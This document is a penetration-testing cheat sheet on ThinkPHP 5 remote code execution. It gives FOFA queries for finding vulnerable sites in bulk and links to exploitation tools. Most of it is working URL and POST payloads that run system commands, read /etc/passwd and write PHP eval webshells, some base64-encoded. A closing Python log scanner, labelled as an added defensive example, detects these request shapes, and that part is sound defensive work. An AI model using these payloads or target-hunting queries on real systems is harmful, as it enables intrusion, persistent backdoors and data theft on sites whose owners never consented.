ThinkPHP
Introduction
ThinkPHP is an open-source framework: a lightweight PHP development framework written by Chinese developers that supports server environments such as Windows, Unix and Linux.
Many CMSs are built as secondary developments on top of ThinkPHP, so when ThinkPHP has a vulnerability it affects a large number of sites built on it.
Determining whether a site uses ThinkPHP
Check whether the error page shows ThinkPHP's smiley face.
Checking for vulnerabilities in bulk
Using FOFA
```
header="thinkphp" && country!="CN"
header="thinkphp" && country!="CN" && title="后台管理"
header="thinkphp" && country!="CN" && title="后台管理" && after="2021-01-01"
```
Exploitation tools
https://github.com/Lotus6/ThinkphpGUI
https://github.com/bewhale/thinkphp_gui_tools
https://github.com/MrHatSec/ThinkPhp5.x_Scan
ThinkPHP 3 vulnerability summary
https://y4er.com/post/thinkphp3-vuln/
ThinkPHP 5 RCE summary
https://y4er.com/post/thinkphp5-rce/
Common PoCs for 5.0.*
Command execution
```
/index.php?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
/index.php?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
/index.php?s=index/\think\Request/input&filter=system&data=id
/index.php?s=/index/\think\request/cache&key=1|phpinfo
```
Writing a webshell
![image-20240116180519363](https://allinit-1317182407.cos.ap-nanjing.myqcloud.com/%E6%B8%97%E9%80%8F/Struts2/image-20240116180519363.png)
```
/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=<?php @eval($_POST['cmd']);?>
/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo -n YWFhPD9waHAgQGV2YWwoJF9QT1NUW2NjY10pOz8+YmJi | base64 -d > shell9.php
```
Note: if the Base64-encoded string contains a `+`, it must be URL-encoded when placed in the URL, i.e. `+` becomes `%2B`.
Other payloads
```
/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
/index.php?s=index/\think\Request/input&filter=phpinfo&data=1
/index.php?s=index/\think\Request/input&filter=system&data=id
/index.php?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20phpinfo();?%3E
/index.php?s=index/\think\view\driver\Php/display&content=%3C?php%20phpinfo();?%3E
/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
/index.php?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
/index.php?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
```
Exploitation PoCs for 5.1.*
Command execution
```
/index.php?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
/index.php?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
/index.php?s=index/\think\Request/input&filter=system&data=id
/index.php?s=/index/\think\request/cache&key=1|phpinfo
```
Writing a webshell
```
/index.php?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "<?php @eval(\$_POST[cmd]);?>" >shell.php
(echo "^<?php @eval(\$_POST[ccc]);?^>" >shell1.php)
```
Other payloads
```
/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
/index.php?s=index/\think\Request/input&filter=phpinfo&data=1
/index.php?s=index/\think\Request/input&filter=system&data=id
/index.php?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20phpinfo();?%3E
/index.php?s=index/\think\view\driver\Php/display&content=%3C?php%20phpinfo();?%3E
/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
/index.php?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
/index.php?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
```
5.0.23
```
POST:/index.php?s=captcha
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=cat /etc/passwd

POST:/index.php?s=captcha
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo "<?php eval(\$_POST['cmd']);?>" > 1.php
```
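As an added defensive example that is not part of these notes, the Python below scans constructed access-log entries for the request shapes the payloads above share: a `\think\` class injected through the `s=` route, `invokefunction` / `call_user_func_array`, a `filter` parameter naming a PHP callable, and the 5.0.23 `_method=__construct` override in a POST body. The tab-separated log format, the sample lines and the callable list are assumptions made for the demo.

```python
# Added example, not from the original notes: scans constructed log lines for the ThinkPHP 5 RCE request shapes above.
import re
from urllib.parse import unquote_plus

# Route injection: the `s=` parameter names a fully qualified class under the `think` namespace.
THINK_CLASS = re.compile(r"\\think\\[\w\\]+", re.IGNORECASE)
# A `filter` (or `filter[]`) parameter naming a PHP callable; only the two used above are listed (assumption: extend as needed).
FILTER_PARAM = re.compile(r"(?:^|[&?])filter(?:\[\])?=([A-Za-z_]+)")
CALLABLE_NAMES = {"system", "phpinfo"}

def classify(method, path, body=""):
    """Return the indicator names one request triggers (empty list = clean)."""
    # Decode once so %5Cthink%5C and a literal \think\ are treated alike.
    text = unquote_plus(path) + "&" + unquote_plus(body)
    hits = []
    if THINK_CLASS.search(text):
        hits.append("think-class-in-route")
    if "invokefunction" in text.lower() or "function=call_user_func_array" in text:
        hits.append("invokefunction-callback")
    m = FILTER_PARAM.search(text)
    if m and m.group(1).lower() in CALLABLE_NAMES:
        hits.append("filter-callable")
    # 5.0.23 variant: method override to __construct smuggled in a POST body.
    if method.upper() == "POST" and "_method=__construct" in text:
        hits.append("method-override-construct")
    return hits

def scan_log(lines):
    """Return [(line_no, indicators)] for every suspicious entry."""
    findings = []
    for n, line in enumerate(lines, 1):
        # Constructed format: method, path and body separated by tabs.
        method, path, body = (line.rstrip("\n").split("\t", 2) + ["", ""])[:3]
        hits = classify(method, path, body)
        if hits:
            findings.append((n, hits))
    return findings

# Constructed sample entries mirroring the payload shapes above (line 1 is benign).
SAMPLE_LOG = [
    "GET\t/index.php?s=index/user/login\t",
    "GET\t/index.php?s=index/\\think\\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1\t",
    "GET\t/index.php?s=index/%5Cthink%5CRequest/input&filter=system&data=id\t",
    "POST\t/index.php?s=captcha\t_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id",
    "GET\t/index.php?s=index/\\think\\request/cache&key=1|phpinfo\t",
]
```

Running `scan_log(SAMPLE_LOG)` flags lines 2 to 5 with the indicators each one trips; matching on the decoded `s=` route rather than a literal string catches the `%5C`-encoded variant too.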